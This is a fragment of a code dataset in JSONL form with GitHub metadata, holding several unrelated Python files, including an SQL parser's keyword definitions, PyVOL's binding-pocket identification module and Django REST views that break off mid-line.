caseless=True).suppress()\nWITH = Keyword(\"with\", caseless=True).suppress()\nWITHIN = Keyword(\"within\", caseless=True).suppress()\n\n# SIMPLE OPERATORS\nCASTING = Literal(\"::\").set_parser_name(\"concat\")\nCONCAT = Literal(\"||\").set_parser_name(\"concat\")\nMUL = Literal(\"*\").set_parser_name(\"mul\")\nDIV = Literal(\"/\").set_parser_name(\"div\")\nMOD = Literal(\"%\").set_parser_name(\"mod\")\nNEG = Literal(\"-\").set_parser_name(\"neg\")\nADD = Literal(\"+\").set_parser_name(\"add\")\nSUB = Literal(\"-\").set_parser_name(\"sub\")\nBINARY_NOT = Literal(\"~\").set_parser_name(\"binary_not\")\nBINARY_AND = Literal(\"&\").set_parser_name(\"binary_and\")\nBINARY_OR = Literal(\"|\").set_parser_name(\"binary_or\")\nGTE = Literal(\">=\").set_parser_name(\"gte\")\nLTE = Literal(\"<=\").set_parser_name(\"lte\")\nLT = Literal(\"<\").set_parser_name(\"lt\")\nGT = Literal(\">\").set_parser_name(\"gt\")\nEQ = (Literal(\"==\") | Literal(\"=\")).set_parser_name(\"eq\")\nNEQ = (Literal(\"!=\") | Literal(\"<>\")).set_parser_name(\"neq\")\n\nAND = Keyword(\"and\", caseless=True)\nBETWEEN = Keyword(\"between\", caseless=True)\nCASE = Keyword(\"case\", caseless=True).suppress()\nCOLLATE = Keyword(\"collate\", caseless=True)\nEND = Keyword(\"end\", caseless=True)\nELSE = Keyword(\"else\", caseless=True).suppress()\nIN = Keyword(\"in\", caseless=True)\nIS = Keyword(\"is\", caseless=True)\nNOT = Keyword(\"not\", caseless=True)\nOR = Keyword(\"or\", caseless=True)\n\n# COMPOUND KEYWORDS\nCROSS_JOIN = Group(CROSS + JOIN).set_parser_name(\"cross join\")\nFULL_JOIN = Group(FULL + JOIN).set_parser_name(\"full join\")\nFULL_OUTER_JOIN = Group(FULL + OUTER + JOIN).set_parser_name(\"full outer join\")\nGROUP_BY = Group(GROUP + BY).set_parser_name(\"group by\")\nINNER_JOIN = Group(INNER + JOIN).set_parser_name(\"inner join\")\nLEFT_JOIN = Group(LEFT + JOIN).set_parser_name(\"left join\")\nLEFT_OUTER_JOIN = Group(LEFT + OUTER + JOIN).set_parser_name(\"left outer join\")\nORDER_BY = Group(ORDER + BY).set_parser_name(\"order by\")\nPARTITION_BY = Group(PARTITION + BY).set_parser_name(\"partition by\")\nRIGHT_JOIN = Group(RIGHT + JOIN).set_parser_name(\"right join\")\nRIGHT_OUTER_JOIN = Group(RIGHT + OUTER + JOIN).set_parser_name(\"right outer join\")\nSELECT_DISTINCT = Group(SELECT + DISTINCT).set_parser_name(\"select distinct\")\nUNION_ALL = Group(UNION + ALL).set_parser_name(\"union_all\")\nWITHIN_GROUP = Group(WITHIN + GROUP).set_parser_name(\"within_group\")\n\n# COMPOUND OPERATORS\nNOT_BETWEEN = Group(NOT + BETWEEN).set_parser_name(\"not_between\")\nNOT_LIKE = Group(NOT + LIKE).set_parser_name(\"not_like\")\nNOT_RLIKE = Group(NOT + RLIKE).set_parser_name(\"not_rlike\")\nNOT_IN = Group(NOT + IN).set_parser_name(\"nin\")\nIS_NOT = Group(IS + NOT).set_parser_name(\"is_not\")\n\nRESERVED = MatchFirst([\n ALL,\n AND,\n AS,\n ASC,\n BETWEEN,\n BY,\n CASE,\n CAST,\n COLLATE,\n CROSS_JOIN,\n CROSS,\n DESC,\n DISTINCT,\n ELSE,\n END,\n FALSE,\n FROM,\n FULL_JOIN,\n FULL_OUTER_JOIN,\n FULL,\n GROUP_BY,\n GROUP,\n HAVING,\n IN,\n INNER_JOIN,\n INNER,\n INTERVAL,\n IS_NOT,\n IS,\n JOIN,\n LEFT_JOIN,\n LEFT_OUTER_JOIN,\n LEFT,\n LIKE,\n LIMIT,\n NOCASE,\n NOT_BETWEEN,\n NOT_IN,\n NOT_LIKE,\n NOT_RLIKE,\n NOT,\n NULL,\n OFFSET,\n ON,\n OR,\n ORDER_BY,\n ORDER,\n OUTER,\n OVER,\n PARTITION_BY,\n PARTITION,\n RIGHT_JOIN,\n RIGHT_OUTER_JOIN,\n RIGHT,\n RLIKE,\n SELECT_DISTINCT,\n SELECT,\n THEN,\n TRUE,\n UNION_ALL,\n UNION,\n USING,\n WHEN,\n WHERE,\n WITH,\n WITHIN_GROUP,\n WITHIN,\n])\n\nLB = Literal(\"(\").suppress()\nRB = Literal(\")\").suppress()\n\njoin_keywords = {\n \"join\",\n \"full join\",\n \"cross join\",\n \"inner join\",\n \"left join\",\n \"right join\",\n \"full outer join\",\n \"right outer join\",\n \"left outer join\",\n}\n\nunary_ops = (NEG, NOT, BINARY_NOT)\n\nprecedence = {\n # https://www.sqlite.org/lang_expr.html\n \"cast\": 0,\n \"collate\": 0,\n \"concat\": 1,\n \"mul\": 2,\n \"div\": 2,\n \"mod\": 2,\n \"neg\": 3,\n \"add\": 3,\n \"sub\": 3,\n \"binary_not\": 4,\n \"binary_and\": 4,\n \"binary_or\": 4,\n \"gte\": 5,\n \"lte\": 5,\n \"lt\": 5,\n \"gt\": 6,\n \"eq\": 7,\n \"neq\": 7,\n \"between\": 8,\n \"not_between\": 8,\n \"in\": 8,\n \"nin\": 8,\n \"is\": 8,\n \"like\": 8,\n \"not_like\": 8,\n \"rlike\": 8,\n \"not_rlike\": 8,\n \"and\": 10,\n \"or\": 11,\n}\n\n\nKNOWN_OPS = [\n CASTING,\n COLLATE,\n CONCAT,\n MUL | DIV | MOD,\n NEG,\n ADD | SUB,\n BINARY_NOT,\n BINARY_AND,\n BINARY_OR,\n GTE | LTE | LT | GT,\n EQ | NEQ,\n (BETWEEN, AND),\n (NOT_BETWEEN, AND),\n IN,\n NOT_IN,\n IS_NOT,\n IS,\n LIKE,\n NOT_LIKE,\n RLIKE,\n NOT_RLIKE,\n NOT,\n AND,\n OR,\n]\n\ntimes = [\"now\", \"today\", \"tomorrow\", \"eod\"]\n\ndurations = {\n \"microseconds\": \"microsecond\",\n \"microsecond\": \"microsecond\",\n \"microsecs\": \"microsecond\",\n \"microsec\": \"microsecond\",\n \"useconds\": \"microsecond\",\n \"usecond\": \"microsecond\",\n \"usecs\": \"microsecond\",\n \"usec\": \"microsecond\",\n \"us\": \"microsecond\",\n \"milliseconds\": \"millisecond\",\n \"millisecond\": \"millisecond\",\n \"millisecon\": \"millisecond\",\n \"mseconds\": \"millisecond\",\n \"msecond\": \"millisecond\",\n \"millisecs\": \"millisecond\",\n \"millisec\": \"millisecond\",\n \"msecs\": \"millisecond\",\n \"msec\": \"millisecond\",\n \"ms\": \"millisecond\",\n \"seconds\": \"second\",\n \"second\": \"second\",\n \"secs\": \"second\",\n \"sec\": \"second\",\n \"s\": \"second\",\n \"minutes\": \"minute\",\n \"minute\": \"minute\",\n \"mins\": \"minute\",\n \"min\": \"minute\",\n \"m\": \"minute\",\n \"hours\": \"hour\",\n \"hour\": \"hour\",\n \"hrs\": \"hour\",\n \"hr\": \"hour\",\n \"h\": \"hour\",\n \"days\": \"day\",\n \"day\": \"day\",\n \"d\": \"day\",\n \"dayofweek\": \"dow\",\n \"dow\":\"dow\",\n \"weekday\":\"dow\",\n \"weeks\": \"week\",\n \"week\": \"week\",\n \"w\": \"week\",\n \"months\": \"month\",\n \"mons\": \"month\",\n \"mon\": \"month\",\n \"quarters\": \"quarter\",\n \"quarter\": \"quarter\",\n \"years\": \"year\",\n \"year\": \"year\",\n \"decades\": \"decade\",\n \"decade\": \"decade\",\n \"decs\": \"decade\",\n \"dec\": \"decade\",\n \"centuries\": \"century\",\n \"century\": \"century\",\n \"cents\": \"century\",\n \"cent\": \"century\",\n \"c\": \"century\",\n \"millennia\": \"millennium\",\n \"millennium\": \"millennium\",\n \"mils\": \"millennium\",\n \"mil\": \"millennium\",\n \"epoch\": \"epoch\",\n}\n\n_size = Optional(LB + intNum(\"params\") + RB)\n_sizes = Optional(LB + intNum(\"params\") + \",\" + intNum(\"params\") + RB)\n\n# KNOWN TYPES\nARRAY = Group(Keyword(\"array\", caseless=True)(\"op\")).addParseAction(to_json_call)\nBIGINT = Group(Keyword(\"bigint\", caseless=True)(\"op\")).addParseAction(to_json_call)\nBOOL = Group(Keyword(\"bool\", caseless=True)(\"op\")).addParseAction(to_json_call)\nBOOLEAN = Group(Keyword(\"boolean\", caseless=True)(\"op\")).addParseAction(to_json_call)\nDOUBLE = Group(Keyword(\"double\", caseless=True)(\"op\")).addParseAction(to_json_call)\nFLOAT64 = Group(Keyword(\"float64\", caseless=True)(\"op\")).addParseAction(to_json_call)\nGEOMETRY = Group(Keyword(\"geometry\", caseless=True)(\"op\")).addParseAction(to_json_call)\nINTEGER = Group(Keyword(\"integer\", caseless=True)(\"op\")).addParseAction(to_json_call)\nINT = Group(Keyword(\"int\", caseless=True)(\"op\")).addParseAction(to_json_call)\nINT32 = Group(Keyword(\"int32\", caseless=True)(\"op\")).addParseAction(to_json_call)\nINT64 = Group(Keyword(\"int64\", caseless=True)(\"op\")).addParseAction(to_json_call)\nREAL = Group(Keyword(\"real\", caseless=True)(\"op\")).addParseAction(to_json_call)\nTEXT = Group(Keyword(\"text\", caseless=True)(\"op\")).addParseAction(to_json_call)\nSMALLINT = Group(Keyword(\"smallint\", caseless=True)(\"op\")).addParseAction(to_json_call)\nSTRING = Group(Keyword(\"string\", caseless=True)(\"op\")).addParseAction(to_json_call)\nSTRUCT = Group(Keyword(\"struct\", caseless=True)(\"op\")).addParseAction(to_json_call)\n\nBLOB = (Keyword(\"blob\", caseless=True)(\"op\") + _size).addParseAction(to_json_call)\nBYTES = (Keyword(\"bytes\", caseless=True)(\"op\") + _size).addParseAction(to_json_call)\nCHAR = (Keyword(\"char\", caseless=True)(\"op\") + _size).addParseAction(to_json_call)\nVARCHAR = (Keyword(\"varchar\", caseless=True)(\"op\") + _size).addParseAction(to_json_call)\n\nDECIMAL = (\n Keyword(\"decimal\", caseless=True)(\"op\") + _sizes\n).addParseAction(to_json_call)\nNUMERIC = (\n Keyword(\"numeric\", caseless=True)(\"op\") + _sizes\n).addParseAction(to_json_call)\n\n\nDATE = Keyword(\"date\", caseless=True)\nDATETIME = Keyword(\"datetime\", caseless=True)\nTIME = Keyword(\"time\", caseless=True)\nTIMESTAMP = Keyword(\"timestamp\", caseless=True)\nTIMESTAMPTZ = Keyword(\"timestamptz\", caseless=True)\nTIMETZ = Keyword(\"timetz\", caseless=True)\n\ntime_functions = MatchFirst([DATE, DATETIME, TIME, TIMESTAMP, TIMESTAMPTZ, TIMETZ])\n\n# KNOWNN TIME TYPES\n_format = Optional(Regex(r'\\\"(\\\"\\\"|[^\"])*\\\"')(\"params\").addParseAction(unquote))\n\nDATE_TYPE = (DATE(\"op\") + _format).addParseAction(to_json_call)\nDATETIME_TYPE = (DATETIME(\"op\") + _format).addParseAction(to_json_call)\nTIME_TYPE = (TIME(\"op\") + _format).addParseAction(to_json_call)\nTIMESTAMP_TYPE = (TIMESTAMP(\"op\") + _format).addParseAction(to_json_call)\nTIMESTAMPTZ_TYPE = (TIMESTAMPTZ(\"op\") + _format).addParseAction(to_json_call)\nTIMETZ_TYPE = (TIMETZ(\"op\") + _format).addParseAction(to_json_call)\n\nknown_types = MatchFirst([\n ARRAY,\n BIGINT,\n BOOL,\n BOOLEAN,\n BLOB,\n BYTES,\n CHAR,\n DATE_TYPE,\n DATETIME_TYPE,\n DECIMAL,\n DOUBLE,\n FLOAT64,\n GEOMETRY,\n INTEGER,\n INT,\n INT32,\n INT64,\n NUMERIC,\n REAL,\n TEXT,\n SMALLINT,\n STRING,\n STRUCT,\n TIME_TYPE,\n TIMESTAMP_TYPE,\n TIMESTAMPTZ_TYPE,\n TIMETZ_TYPE,\n VARCHAR,\n])\n","repo_name":"astrojams1/cleanstreets","sub_path":".venv/lib/python3.8/site-packages/moz_sql_parser/keywords.py","file_name":"keywords.py","file_ext":"py","file_size_in_byte":11276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"40990294314","text":"import scene\nimport os\n\nclass SceneCollection:\n def __init__(self, path):\n self.dict = {}\n self.load_scenes(path)\n \n def load_scenes(self, path):\n directory = os.fsencode(path)\n\n for subdir, dirs, files in os.walk(directory):\n for dir in dirs:\n dir_path = path + \"/\" + os.fsdecode(dir)\n self.dict.update({dir_path: scene.Scene(dir_path, *(0,0))})\n \n","repo_name":"MlepNos/TimeTrialRacing-Python","sub_path":"RacingGame/scene_collection.py","file_name":"scene_collection.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10027302099","text":"data = input()\r\ndict = {}\r\nwhile data != \"Over\":\r\n splited_data = data.split(\" : \")\r\n name = splited_data[0]\r\n number = splited_data[1]\r\n\r\n if number.isdigit():\r\n dict[name] = number\r\n else:\r\n dict[number] = name\r\n\r\n data = input()\r\n\r\nfor key, value in sorted(dict.items()):\r\n print(f\"{key} -> {value}\")\r\n","repo_name":"yotkoKanchev/Python-Fundamentals-June-2018","sub_path":"02. Lists-and-Dictionaries/5Mixed Phones.py","file_name":"5Mixed Phones.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2737477422","text":"class Hero():\n def __init__(self, name):\n self.name = name\n # 存入歌曲的kkboxID\n self.songIDList = []\n # 黑白名單\n self.whitelist = []\n self.blacklist = []\n #選擇的作者\n self.chooseArtist = \"\"\n self.index = 0\n\n def run(self, msg):\n #使用者想要歌曲了\n if(msg.find(\"給我歌曲\")!=-1):\n return [0,\"give_song\"]\n elif(msg.find(\"生成歌詞\")!=-1):\n \treturn [10,\"~~~生成歌詞~~~\"]\n else:\n #非關鍵字類\n response = self.getBotResponse(msg) #取得chatterbot的回應\n #print(\"response = \" + str(response))\n if(self.index==0):\n # return [0][\"Lry\"]\n self.index +=1\n return [1,\"回應歌詞\"]\n elif(self.index==1):\n self.index +=1\n return [2,\"恩恩,再給我一些提示\"]\n else:\n self.index = 0;\n return [3,\"你喜歡某某歌手齁\"]\n\n\n def getBotResponse(self,msg):\n #這邊進行連接server api的程式\n\n #回傳值\n #[\n # {\n # \"confidence\": float,\n # \"kkboxID\": string,\n # \"Artists\": string,\n # Lry\": string,\n # \"SongName\": string\n # },\n # ...\n # ]\n return_list = []\n # 將結果存起來\n for dd in return_list:\n self.SaveSongMsg(dd)\n return_list = sorted(return_list, key=lambda s: s['confidence'], reverse=True)\n #(\"return_list = \"+ str(return_list))\n return return_list\n\n\n def SaveSongMsg(self,data):\n #print(\"in getSongID_andSave()\")\n if(len(self.songIDList) == 0):\n insideData = {\n 'ID':data['kkboxID'],\n 'times':1,\n 'Artists':data['Artists'],\n \"Confidence\":data['confidence']\n }\n self.songIDList.append(insideData)\n else:\n dd = [d for d in self.songIDList if d.get('ID')==data['kkboxID']]\n if(len(dd) == 0): #如果不存在\n insideData = {\n 'ID':data['kkboxID'],\n 'times':1,\n 'Artists':data['Artists'],\n \"Confidence\":data['confidence']\n }\n self.songIDList.append(insideData)\n else:\n for i in range(len(self.songIDList)):\n if(self.songIDList[i]['ID'] == data['kkboxID']):\n self.songIDList[i]['times'] = self.songIDList[i]['times'] + 1\n break\n\n\n def addWhiteList(self):\n #增加 白名單 的程式碼\n print(\"加入白名單\")\n \n def addBlackList(self):\n #增加 黑名單 的程式碼\n print(\"加入黑名單\")\n\n def Reset(self):\n # 存入歌曲的kkboxID\n self.songIDList = []\n # 黑白名單\n self.whitelist = []\n self.blacklist = []\n #選擇的作者\n self.chooseArtist = \"\"\n self.index = 0","repo_name":"andychod/LittleProject","sub_path":"kkboxTemp/Batman.py","file_name":"Batman.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30997767383","text":"def calc(NL_PG,NL_R,N_r,W_max,is_offline):\n r_dilation = []\n\n pg_dilation1 = []\n pg_dilation2 = []\n future_vec = []\n\n if is_offline:\n for i in range(NL_PG):\n pg_dilation1.append(2**i)\n pg_dilation2.append(2**(NL_PG-i-1))\n future_vec.append(max(2**i,2**(NL_PG-i-1)))\n\n PG_future = sum(future_vec)\n PG_rceptive = 2*PG_future + 1\n for i in range(NL_R):\n r_dilation.append(2**i)\n R_future = sum(r_dilation)\n R_receptive = 2*R_future +1\n\n total_receptive = PG_rceptive + N_r*(R_receptive - 1)\n total_future = PG_future + N_r * R_future\n # total_receptive1 = total_future*2 +1\n print(total_future)\n return total_future, total_receptive\n else:\n for i in range(NL_PG):\n delta_1 = min(2**i,W_max)\n delta_2 = min(2**(NL_PG-i-1),W_max)\n pg_dilation1.append(delta_1)\n pg_dilation2.append(delta_2)\n future_vec.append(max(delta_1, delta_2))\n PG_future = sum(future_vec)\n\n for i in range(NL_R):\n r_dilation.append(min(2**i,W_max))\n R_future = sum(r_dilation)\n total_future = PG_future + (N_r * R_future)\n print(total_future)\n return total_future, \"not impementet yet\"\n\n\n\ncalc(10,10,3,10,True)","repo_name":"AdamGoldbraikh/Bounded-Future-MS-TCNPP-for-Surgical-Gesture-Recognition","sub_path":"receptive_field_params_calc.py","file_name":"receptive_field_params_calc.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72153081169","text":"import requests\nimport json\n\nresponse_get = requests.get('http://127.0.0.1:5000/values')\n\ndados = response_get.json()\nprint(dados)\nprint(f\"Total Sum is: {dados['total_sum']}\")\n\nresponse_post = requests.post('http://127.0.0.1:5000/values', json={'values': [10, 20, 30, 40]})\n\ndados = response_post.json()\nprint(dados)\nprint(f\"Total Sum is: {dados['total_sum']}\")","repo_name":"uadson/flask_restapi","sub_path":"requests_file.py","file_name":"requests_file.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"133452650","text":"\nfrom .spheres import Spheres\nfrom . import cluster, configuration, utilities\nimport glob\nimport inspect\nimport itertools\nimport logging\nimport numpy as np\nimport os\nimport pandas as pd\nimport shutil\nimport sys\n\nlogger = logging.getLogger(__name__)\n\ndef load_calculation(data_dir, input_opts=None):\n \"\"\" load the results of a calculation from file\n\n Args:\n data_dir (str): directory where previous calculation results are stored\n input_opts (dict): dictionary of pyvol options that is used to update the options read in from file\n\n Returns:\n pockets ([Spheres]): a list of Spheres objects each of which contains the geometric information describing a distinct pocket or subpocket\n opts (dict): updated PyVOL options dictionary\n\n \"\"\"\n\n if not os.path.isdir(data_dir):\n logger.error(\"{0} is not a directory\".format(data_dir))\n raise FileNotFoundError\n\n cfg_files = glob.glob(os.path.join(data_dir, \"*.cfg\"))\n if len(cfg_files) == 0:\n logger.error(\"No cfg file found in {0}\".format(data_dir))\n raise FileNotFoundError\n elif len(cfg_files) > 1:\n logger.error(\"Multiple cfg files found in {0}\".format(data_dir))\n raise FileNotFoundError\n\n opts = configuration.file_to_opts(cfg_files[0])\n if isinstance(input_opts, dict):\n opts.update(input_opts)\n opts = configuration.clean_opts(opts)\n\n rept_file = os.path.join(data_dir, \"{0}.rept\".format(opts.get(\"prefix\")))\n if not os.path.isfile(rept_file):\n logger.error(\"No rept file found at {0}\".format(rept_file))\n raise FileNotFoundError\n\n rept_df = pd.read_csv(rept_file)\n pockets = []\n for index, row in rept_df.iterrows():\n xyzrg_file = os.path.join(data_dir, \"{0}.xyzrg\".format(row[\"name\"]))\n pockets.append(Spheres(spheres_file=xyzrg_file))\n\n return pockets, opts\n\n\ndef pocket(**opts):\n \"\"\"Calculates the SES for a binding pocket\n\n Args:\n opts (dict): dictionary containing all PyVOL options (see pyvol.pymol_interface.pymol_pocket_cmdline for details)\n\n Returns:\n pockets ([Spheres]): a list of Spheres objects each of which contains the geometric information describing a distinct pocket or subpocket\n\n \"\"\"\n\n if os.path.dirname(opts.get(\"prot_file\")) != opts.get(\"output_dir\"):\n new_prot_file = os.path.join(opts.get(\"output_dir\"), os.path.basename(opts.get(\"prot_file\")))\n shutil.copyfile(opts.get(\"prot_file\"), new_prot_file)\n opts[\"prot_file\"] = new_prot_file\n\n if opts.get(\"lig_file\") is not None:\n new_lig_file = os.path.join(opts.get(\"output_dir\"), os.path.basename(opts.get(\"lig_file\")))\n shutil.copyfile(opts.get(\"lig_file\"), new_lig_file)\n opts[\"lig_file\"] = new_lig_file\n\n p_s = Spheres(pdb=opts.get(\"prot_file\"), name=\"{0}_prot\".format(opts.get(\"prefix\")))\n logger.debug(\"Protein geometry read from {0}\".format(opts.get(\"prot_file\")))\n\n pl_s = p_s.copy()\n if opts.get(\"lig_file\") is not None:\n l_s = Spheres(pdb=opts.get(\"lig_file\"), r=opts.get(\"lig_incl_rad\"), name=\"{0}_lig_incl\".format(opts.get(\"prefix\")))\n logger.debug(\"Ligand geometry read from {0}\".format(opts.get(\"lig_file\")))\n if opts.get(\"lig_incl_rad\") is not None:\n pl_s = p_s + l_s\n logger.debug(\"Ligand-inclusion radius of {0} applied\".format(opts.get(\"lig_incl_rad\")))\n else:\n l_s = None\n\n pl_s.name = \"{0}_interior\".format(opts.get(\"prefix\"))\n\n pl_bs = pl_s.calculate_surface(probe_radius=opts.get(\"max_rad\"))[0]\n logger.debug(\"Outer bulk-solvent surface calculated\")\n pl_bs.name = \"{0}_boundary\".format(opts.get(\"prefix\"))\n\n pa_s = p_s + pl_bs\n pa_s.name = \"{0}_exterior\".format(opts.get(\"prefix\"))\n if (l_s is not None) and (opts.get(\"lig_excl_rad\") is not None):\n le_s = Spheres(xyz=l_s.xyzr, r=opts.get(\"lig_excl_rad\"), name=\"{0}_lig_excl\".format(opts.get(\"prefix\")))\n le_bs = le_s.calculate_surface(probe_radius=opts.get(\"max_rad\"))[0]\n pa_s = pa_s + le_bs\n logger.debug(\"Ligand-excluded radius of {0} applied\".format(opts.get(\"lig_excl_rad\")))\n\n if opts.get(\"mode\") == \"all\":\n all_pockets = pa_s.calculate_surface(probe_radius=opts.get(\"min_rad\"), all_components=True, min_volume=opts.get(\"min_volume\"))\n for index, pocket in enumerate(all_pockets):\n pocket.name = \"{0}_p{1}\".format(opts.get(\"prefix\"), index)\n logger.info(\"Pockets calculated using mode 'all': {0}\".format(len(all_pockets)))\n if opts.get(\"subdivide\"):\n logger.warning(\"Subpocket clustering not currently supported when calculating all independent pockets\")\n else:\n if opts.get(\"mode\") == \"largest\":\n bp_bs = pa_s.calculate_surface(probe_radius=opts.get(\"min_rad\"), all_components=True, largest_only=True)[0]\n logger.info(\"Largest pocket identified\")\n elif opts.get(\"mode\") == \"specific\":\n if opts.get(\"coordinates\") is not None:\n coordinate = opts.get(\"coordinates\")\n logger.info(\"Specific pocket identified from coordinate: {0}\".format(opts.get(\"coordinates\")))\n elif opts.get(\"resid\") is not None:\n resid = str(opts.get(\"resid\"))\n chain = None\n if not resid[0].isdigit():\n chain = resid[0]\n resid = int(resid[1:])\n else:\n resid = int(resid)\n coordinate = utilities.coordinates_for_resid(opts.get(\"prot_file\"), resid=resid, chain=chain)\n logger.info(\"Specific pocket identified from residue: {0} -> {1} (truncated)\".format(opts.get(\"resid\"), coordinate[0,:]))\n elif l_s is not None:\n lig_coords = l_s.xyz\n coordinate = np.mean(l_s.xyz, axis=0).reshape(1, -1)\n logger.info(\"Specific pocket identified from mean ligand position: {0}\".format(coordinate))\n else:\n logger.error(\"A coordinate, ligand, or residue must be supplied to run in specific mode\")\n return None\n\n p_bs = p_s.calculate_surface(probe_radius=opts.get(\"min_rad\"))[0]\n id_coord = p_bs.nearest_coord_to_external(coordinate).reshape(1, -1)\n bp_bs = pa_s.calculate_surface(probe_radius=opts.get(\"min_rad\"), coordinate=id_coord)[0]\n else:\n logger.error(\"Unrecognized mode <{0}>--should be 'all', 'largest', or 'specific'\".format(opts.get(\"mode\")))\n return None\n\n bp_bs.name = \"{0}_p0\".format(opts.get(\"prefix\"))\n\n if bp_bs.mesh.volume > pl_bs.mesh.volume:\n logger.error(\"Binding pocket not correctly identified--try an alternative method to specify the binding pocket\")\n return [], opts\n else:\n all_pockets = [bp_bs]\n\n if opts.get(\"subdivide\"):\n all_pockets.extend(subpockets(bounding_spheres = pa_s, ref_spheres = bp_bs, **opts))\n logger.info(\"Subpockets identified: {0}\".format(len(all_pockets) - 1))\n\n write_report(all_pockets, **opts)\n write_cfg(**opts)\n\n return all_pockets, opts\n\n\ndef pocket_wrapper(**opts):\n \"\"\" wrapper for pocket that configures the logger, sanitizes inputs, and catches errors; useful when running from the command line or PyMOL but split from the core code for programmatic usage\n\n Args:\n opts (dict): dictionary containing all PyVOL options (see pyvol.pymol_interface.pymol_pocket_cmdline for details)\n\n Returns:\n pockets ([Spheres]): a list of Spheres objects each of which contains the geometric information describing a distinct pocket or subpocket\n output_opts (dict): dictionary containing the actual options used in the pocket calculation\n\n \"\"\"\n\n opts = configuration.clean_opts(opts)\n\n utilities.check_dir(opts.get(\"output_dir\"))\n\n log_file = os.path.join(opts.get(\"output_dir\"), \"{0}.log\".format(opts.get(\"prefix\")))\n utilities.configure_logger(filename=log_file, stream_level=opts.get(\"logger_stream_level\"), file_level=opts.get(\"logger_file_level\"))\n logger.debug(\"Logger configured\")\n\n all_pockets, output_opts = pocket(**opts)\n\n return all_pockets, output_opts\n\n\ndef subpockets(bounding_spheres, ref_spheres, **opts):\n \"\"\"\n\n Args:\n bounding_spheres (Spheres): a Spheres object containing both the peptide and solvent exposed face external spheres\n ref_spheres (Spheres): a Spheres object holding the interior spheres that define the pocket to be subdivided\n opts (dict): a dictionary containing all PyVOL options (see pyvol.configuration.clean_opts for details)\n\n Returns:\n grouped_list ([Spheres]): a list of Spheres objects each of which contains the geometric information describing a distinct subpocket\n\n \"\"\"\n\n nonextraneous_rad = opts.get(\"min_rad\") + opts.get(\"max_rad\") + opts.get(\"inclusion_radius_buffer\")\n nonextraneous_spheres = bounding_spheres.identify_nonextraneous(ref_spheres=ref_spheres, radius=nonextraneous_rad)\n\n sampling_radii = np.flip(np.arange(opts.get(\"min_rad\"), opts.get(\"max_subpocket_rad\"), opts.get(\"radial_sampling\")), axis=0)\n unmerged_sphere_lists = utilities.sphere_multiprocessing(nonextraneous_spheres, sampling_radii, all_components=True)\n spheres = cluster.merge_sphere_list(itertools.chain(*unmerged_sphere_lists))\n\n cluster.hierarchically_cluster_spheres(spheres, ordered_radii=sampling_radii, min_new_radius=opts.get(\"min_subpocket_rad\"), min_cluster_size=opts.get(\"min_cluster_size\"), max_clusters=opts.get(\"max_clusters\"))\n\n cluster.remove_overlap(spheres, radii=sampling_radii, spacing=opts.get(\"radial_sampling\"))\n cluster.remove_overlap(spheres)\n cluster.remove_interior(spheres)\n grouped_list = cluster.extract_groups(spheres, surf_radius=opts.get(\"min_subpocket_surf_rad\"), prefix=opts.get(\"prefix\"))\n return grouped_list\n\n\ndef write_cfg(**opts):\n \"\"\" write the processed configuration to file\n\n Args:\n output_dir (str): output directory, relative or absolute\n prefix (str): identifying prefix for the output files\n\n \"\"\"\n\n utilities.check_dir(opts.get(\"output_dir\"))\n configuration.opts_to_file(opts)\n\n\ndef write_report(all_pockets, **opts):\n \"\"\" Write a brief report of calculated volumes to file\n\n Args:\n all_pockets ([Spheres]): a list of Spheres objects each of which contains the complete information about a distinct pocket or subpocket\n output_dir (str): output directory, relative or absolute\n prefix (str): identifying prefix for output files\n\n \"\"\"\n import os\n import pandas as pd\n\n utilities.check_dir(opts.get(\"output_dir\"))\n\n rept_list = []\n\n for pocket in all_pockets:\n spheres_name = os.path.join(opts.get(\"output_dir\"), \"{0}.xyzrg\".format(pocket.name))\n pocket.write(spheres_name)\n rept_list.append({\"name\": pocket.name,\n \"volume\": pocket.mesh.volume\n })\n rept_df = pd.DataFrame(rept_list)\n rept_name = os.path.join(opts.get(\"output_dir\"), \"{0}.rept\".format(opts.get(\"prefix\")))\n rept_df.to_csv(rept_name, index=False)\n logger.info(\"Report written to: {0}\".format(rept_name))\n","repo_name":"schlessinger-lab/pyvol","sub_path":"pyvol/identify.py","file_name":"identify.py","file_ext":"py","file_size_in_byte":11191,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"66"} +{"seq_id":"2952679","text":"import datetime\n\nfrom rest_framework import status, request\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.utils import json\n\nfrom JolgorioWebApp.models import Actividad, Usuario, Logro, Material, UsuarioHasActividad\nfrom JolgorioWebApp.serializers import ActividadSerializer, UsuarioSerializer, LogroSerializer, MaterialSerializer\n\n@api_view(['GET'])\ndef listar_actividades(request):\n if request.method == 'GET':\n actividades = Actividad.objects.filter(estado=1).order_by('tipo')\n serializer = ActividadSerializer(actividades, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef listar_materiales(request, id):\n if request.method == 'GET':\n materiales = Material.objects.filter(actividadhasmaterial__actividad_idactividad=id)\n serializer = MaterialSerializer(materiales, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef listar_actividades_completadas(request, id):\n if request.method == 'GET':\n actividades = Actividad.objects.filter(usuariohasactividad__usuario_idusuario=id)\n serializer = ActividadSerializer(actividades, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef listar_actividades_ultimo_mes(request, id):\n if request.method == 'GET':\n actividades = Actividad.objects.filter(usuariohasactividad__usuario_idusuario= id,\n usuariohasactividad__fechacompletado__month=datetime.date.today().month,\n usuariohasactividad__fechacompletado__year=datetime.date.today().year)\n serializer = ActividadSerializer(actividades, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef usuario_por_id(request, id):\n if request.method == 